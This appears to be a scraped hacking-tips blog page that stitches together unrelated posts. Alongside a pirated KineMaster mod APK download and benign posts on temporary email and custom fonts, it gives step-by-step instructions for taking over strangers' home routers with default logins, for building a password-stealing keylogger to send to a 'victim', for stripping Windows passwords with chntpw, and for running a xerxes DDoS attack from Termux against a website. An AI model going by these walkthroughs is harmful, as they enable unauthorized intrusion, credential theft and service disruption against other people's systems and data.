Video editing is one of the most important parts when it comes to making beautiful videos. The better the video looks the more chances are of getting views. Earlier video editing can only be done on PC’s but now after the launch of KineMaster Pro Video Editor, you can do it on your smartphones as well. if you are a PUBG Player then this PUBG GFX+ Tool can help you lot try it now.
KineMaster Pro Video Editing app is one of the best available apps for video editing. It offers a lot number of options for making a good video. You can do whatever you want to. It also has an option for Green Screen which makes it super-useful. Green Screen effect is one of the best effects when it comes to editing a video. In short, it is a complete package for editing a professional video from your smartphones. Install it now and enjoy.
Download KineMaster MOD APK
Download the latest version of KineMaster Mod APK. it is very easy and simple to download and install the apk file. Just click on the link given below to start the download. you can also
All of these features only Available on Premium Version of Kinemaster Apk, But here we Give you an Ultimate Modded version of Kinemaster premium apk, which is Up to dated and the latest version available on Play store, so now look at the Special Mod Features below.
No WaterMark
Chroma Key Feature. (You can Edit Green Screen Videos)
Video Layer enabled for almost all Device.
Speed control. (You can make Slow Motion Videos as well as Fast Video also)
No Ads (100% Ad-free)
Speed control for video clips
Transition effects (3D transitions, wipes, fades, and more)
Supports all the video formats.
Automatically optimize the unsupported videos.
Name KineMaster – Video Editor
Size 63M
Current Version 4.12.1.14890.GP
Requires Android 4.1 and up
Updated 2 Days Ago
Installs 100,000,000+
Requires Android 5.0 and up
Mods Premium Unlocked
Uncategorized

How to Hack the Home Routers and gain the Admin Rights

How to Hack the Home Routers and gain the Admin Rights
Requirements:
Port Scanner (zenmap,superscan or unicornscan.I use Zenmap)
Web Browser (Chrome,Firfox or Safari)
Internet Connection(Any kind of Internet connection)
First of all I want to tell you why I use Zenmap because Nmap is the best friend of hackers and Zenmap is the graphical user interface of nmap.
Instruction on How to Hack the Home Routers and gain the Admin Rights…
1. We should select an IP range. I have selected IP range that includes my public IP address.
XXX.XXX.30.0-XXX.XXX.30.255
2. Now let’s scan for home routers.
When you finished your scan, You can find IP addresses which has open ports such as http port(80), ftp port(21) and telnet port(23).
I have found many IP addesses with port 80 is opened.
So I stopped my scan.
3. Now you can access these addesses using your web browser because http port is opened and we need to find whether the web page is router log in page.
4. If you see the alert error messages, it says TD-8817. So we can Google for it or you can visit routerpassword.com to know the default router username and password
5. Now let’s try to access these IP addresses using default logins we just got on step 4.
Default username and passwords are not same for every routers.
With username : admin and password : admin, we can log in to the router administration page
Uncategorized

Best 5 Temp Mail Providers

Best 5 Temp Mail Providers
1) E4ward : This temporary email service allows you to make multiple aliases. E4ward forwards all the emails to your primary mail address from the assigned aliases. A free user can have only one alias. You can opt for the premium service to have multiple aliases. With this disposable email service, the user can even have more cloud space to store the emails. Further, You can customize your email to “alias@yourdomain.com” by adding your domain.
2) 10minutemail
Here, you are getting a temporary Email address which scraps itself after 10 minutes. However, you can extend or reset the timer by clicking on the ‘refresh‘ button. This resets it back to the 10-minute deadline. Email addresses of this kind are useful when you want to check out a new service. You can even signup for a service temporarily using this email address. This throwaway email service is easy to use and more reliable in terms of privacy.
3) Mailinator
At Mailinator, you can use any alias that you want for receiving email. This disposable email service is in the public domain, and the mails are available in public. The alias you choose can be used by anyone else too. The emails that you receive gets self-deleted after a few hours. The premium plan will get your own personal alias which no one else can access.
4) Guerrilla Mail
All the emails received in this inbox gets deleted after 1 hour. Registration is not required for using this service. Guerrillamail provides users with the option to choose an alias and the desired domain. One more feature which Guerrilla Mail provides its users is to compose emails. The user can send emails to any address over the internet. Senders IP address gets embedded in the email subject automatically to avoid any abuse of this service.
5) ThrowAwayMail
At ThrowAwayMail, users get a unique Disposable Email Id. ThroAwayMail has the validity of 48hrs. To make it a permanent address you need to visit the email page before completing 48 hours. Please make sure that cookies are active in your browser to ensure smooth functioning of this service.
Disclaimer ⚠️ : Please do not use any of these services for private and sensitive information sharing. We do not promote any illegal activities which you can perform by using Disposable Email Services.
Uncategorized

HOW TO HACK EMAIL WITH KEYLOGGER [2020]

HOW TO HACK EMAIL WITH KEYLOGGER [2020] 
First Download “ Rin Logger ”
Download it from searching on google.
Run the keylogger file on your pc and click on “ Create new ”
Now, enter the information as follows:
 
Quote:Email address : your email address (gmail recommended)
.Account Password : Password of your Email address . Keylogger Recipients: Enter your Email address.
Click on next
Now Enable the Attach Screenshots by hitting on it.
Enter theduration (time in minutes) to receive email Key logs. If you set it to 5 minutes, you will receive emails after every 5 minutes. Hit on Next.
After that hit “ verify now ” If you get a message saying verify ,
Even is good to go,  click next
Now enable the “ Install Keylogger ” by clicking on it. Name the file anything you want and select Installation path as “GAme”,
Click on Next
Now, “Enable Website Viewer ” by clicking on it.
Click on Next option
Now, Enable the “Enable File Binder”. Click on next.
Now Enable the “Steal Password” Click on Next
Fill all the information by yourself. And click on next.
Now, hit on “Save As” and select the location where you want
to save your keylogger server file. And click on “Compile Server”. Now
Compile has been done.
You have successfully created a keylogger server file.
Now, simply send this file to your victim via email, once the victim runs our keylogger,
we will key logs every 10 min via email.
Uncategorized

How Do Trojans Work?

How Do Trojans Work
━━━━━━━━━━━━━
Here’s a Trojan malware example to show how it works.
You might think you’ve received an email from someone you know and click on what looks like a legitimate attachment. But you’ve been fooled. The email is from a cybercriminal, and the file you clicked on — and downloaded and opened — has gone on to install malware on your device.
When you execute the program, the malware can spread to other files and damage your computer.
How? It varies. Trojans are designed to do different things. But you’ll probably wish they weren’t doing any of them on your device.
━━━━━━━━━━━━
Uncategorized

HOW TO REMOVE A WINDOWS PASSWORD WITH A LINUX LIVE CD

HOW TO REMOVE A WINDOWS PASSWORD WITH A LINUX LIVE CD
HOW TO REMOVE A WINDOWS PASSWORD WITH A LINUX LIVE CD
Back when I was a Windows user 😅, I know I\’m not the only one who has experienced password loss—that moment where you just can\’t remember your password. Sometimes it happens to the best of us. 
So, how can we get into the system without paying a local geek or geeksquad to do it?
 First, we have to look into how Windows stores their passwords.
When Windows saves your user passwords, it stores them in a SAM file. It stores users\’ passwords in a hashed format (in LM hash and NTLM hash).
 Since a hash function is one-way, this provides some measure of security for the storage of the passwords. However, this can still be bruteforced.😅
Some time ago there was an exploit that allowed you to delete the SAM file and log into any account without a password. This is fixed, since Windows no longer allows access to the SAM file while Windows is running. For this we are going to use a Linux Live CD to remove a Windows password using the chntpw tool.
Requirements
BackTrack 5 on a DVD, or a Linux install with chntpw
A password on a Windows installation
STEP 1 BOOT FROM BACKTRACK
Text in bold is a terminal command.
1.Put the disc in your computer.
2.Hit the the setup button.
3.Change CD/DVD to be first on the boot order.
4.Exit the setup and save your settings.
5.When you get to the console, boot with;
 user:root paswword:toor.
6.Boot into the KDE desktop environment:
    startx
7.Open a terminal.
STEP 2 MOUNT DRIVE & CHANGE WINDOWS PASSWORD
Now we have to mount the Windows drive partition to modify the password, or remove it completely.
First, we have to mount the hard drive partition that the Windows installation is located on..
    mount /dev/sda1 /mnt/
2.Change to the directory that the SAM file is in so that we can prepare to modify its contents.
    cd /mnt//Windows/System32/config
3.List the users on the computer contained in the SAM file.
  chntpw -l SAM
4.Change a specific user account password.
    chntpw -u USERNAME SAM
5.Now, lets unmount the drive and boot from Windows to use the updated or cleared password😁.
    umount /dev/sda1
Uncategorized

5 Common Mistakes That Fresh Hackers Make

 5 Common Mistakes That Fresh Hackers Make
Starting out as a beginner in hacking can be a lot of fun, but there are some common mistakes that most make. If you’re reading this, then you have the unique advantage of avoiding these mistakes when you’re still news. The following five points will tell you what not to do in your journey towards becoming a true hacker.
1. If you see a website offering hacking software or offering to hack email ids for money, avoid them. These websites are nothing but scams and won’t work.
2. A software that claims to hack giants like Google, Facebook, Yahoo and the like is a hoax. There are no such software available. You may get yourself hacked while trying to get these.
3. Don’t use keyloggers and Trojans found as freeware online. These software aren’t meant to be free and you will be giving access to your own computer to another hacker.
4. Programming and scripting languages are very important parts of any hacker’s arsenal. If you plan to use software only then you would also be limited by the software’s functionalities.
5. A good hacker is a good programmer, security expert, developer and good script writer. It is usually not the other way around. You must known this for cross site scripting like P(Pishing)
So, hacking is not simply about making your way into websites and leaving your mark. You have a great set of talents a can also get the best jobs in the industry.
Uncategorized

How to Use Your Own Handwriting as System Font in Android

 How to Use Your Own Handwriting as System Font in Android 
 The method is quite simple and easy and you will first have to create the font of your handwriting and then set that fonts to your device. So follow up the below steps to proceed.
 Steps To Use Your Own Handwriting as System Font in Android:
1 First of all you need to visit the website http://www.myscriptfont.com/.
2 In this website you need to download the template as Pdfor Png and Print It
3 Now fill the form using the black pen and then you need to scan the page in (600x300dpi).
4 Even you can use the cool app CamScanner that will make no need of scanner to scan the document.
5 Now upload the scanned document and give any name to your font
6 Now simply click on start button and you need to wait till it generates .tif file and you need to download that file and place it in your sdcard.
7 Now you need a rooted android and if your don’t have then simply follow the Guide to Root Android.
8 In your rooted android download the app iFont(Expert of Fonts).
9 Now simply click on “My Font” Ttab there and then click on “Click This“,
10 Now simply navigate to location to your .tif file and then simply click on set option there and then the process will start.
 Thats it you are done, now the font will get set to your android, enjoy the cool font on your device.
So this is all about How to Use Your Own Handwriting as System Font in Android. Use the guide and simply set the cool font of your handwriting on your android device.
Uncategorized

How to perform DDoS attack in mobile using xerxes via termuxHy friends

How to perform DDoS attack in mobile using xerxes via termux
Hy friends,
             Welcome back to my blog again. I am Chucky Riley Carter the admin of this blog. Today i am going to tell you that how you can perform DDoS attack in mobile using xerxes via termux app. For this we will use termux which is a terminal emulator and also the small version of linux.
 
What Is Termux :
From the website of termux, it is a terminal emulator and also the small version of linux, which is compatible for smartphones. 
     With termux you can run a small linux environment on your android device. 
Basic Needs :
 
1 – You must have an android device which have android version of 5.0 (lollipop ) or above. 
2 – Termux app ( you can easily find this from play store by just typing termux )
3 – Hacker\’s keyboard ( it is also available in play store )
4 – And the most necessary thing is patience and brain. 
5 – Don\’t do spelling mistakes 
How To Install :
 
1 – To install termux in your android device , first turn on your mobile data and go to play store. Search termux and download it from there. 
2 – Now open the termux app and update it by typing the below command.
[ pkg update ]
3 – Now upgrade it by typing the below command.
[ pkg upgrade ]
4 – To ru xerxes in termux we need the git package and clang package.
5 – To install the git package type the below command.
[ pkg install git ]
 
6 – Now we will install clang package. To install clang package type and run the below command
 [ pkg install clang ]
7 – after installing the above two packages now clone the github file of xerxes to install xerxes in termux. To clone the github file of xerxes run the below command.
8 – After some time it will be cloned to termux. After successfully installing xerxes type the below command to see the all file list.
[ ls ]
 
9 – Now type the below command to go to the current directory of xerxes.
[ cd xerxes ]
10 – After going to the current directory of xerxes type and run the below command to see the all lists of xerxes.
[ ls ]
11 – Now type and run below command to decompile the xerxes.c file
[ clang xerxes.c -o xerxes ]
12 – Thats all the xerxes package is now ready to use.
How To Run :
 
1 – To run the xerxes file in termux now type the below command to perform the DDoS attack .
 [ ./xerxes http://www.website.com 80 ]
2 – To perform a strong DDoS attack ,open multiple terminals and run the above command multiple times.
Precaution :
1 – During the whole process of installing xerxes in termux make sure that you are connected to the internet. 
2 – Don\’t do spelling mistakes , Otherwise your command won\’t run properly. 
3 – Stay calm and composed so that you can solve all the problems you are facing in termux.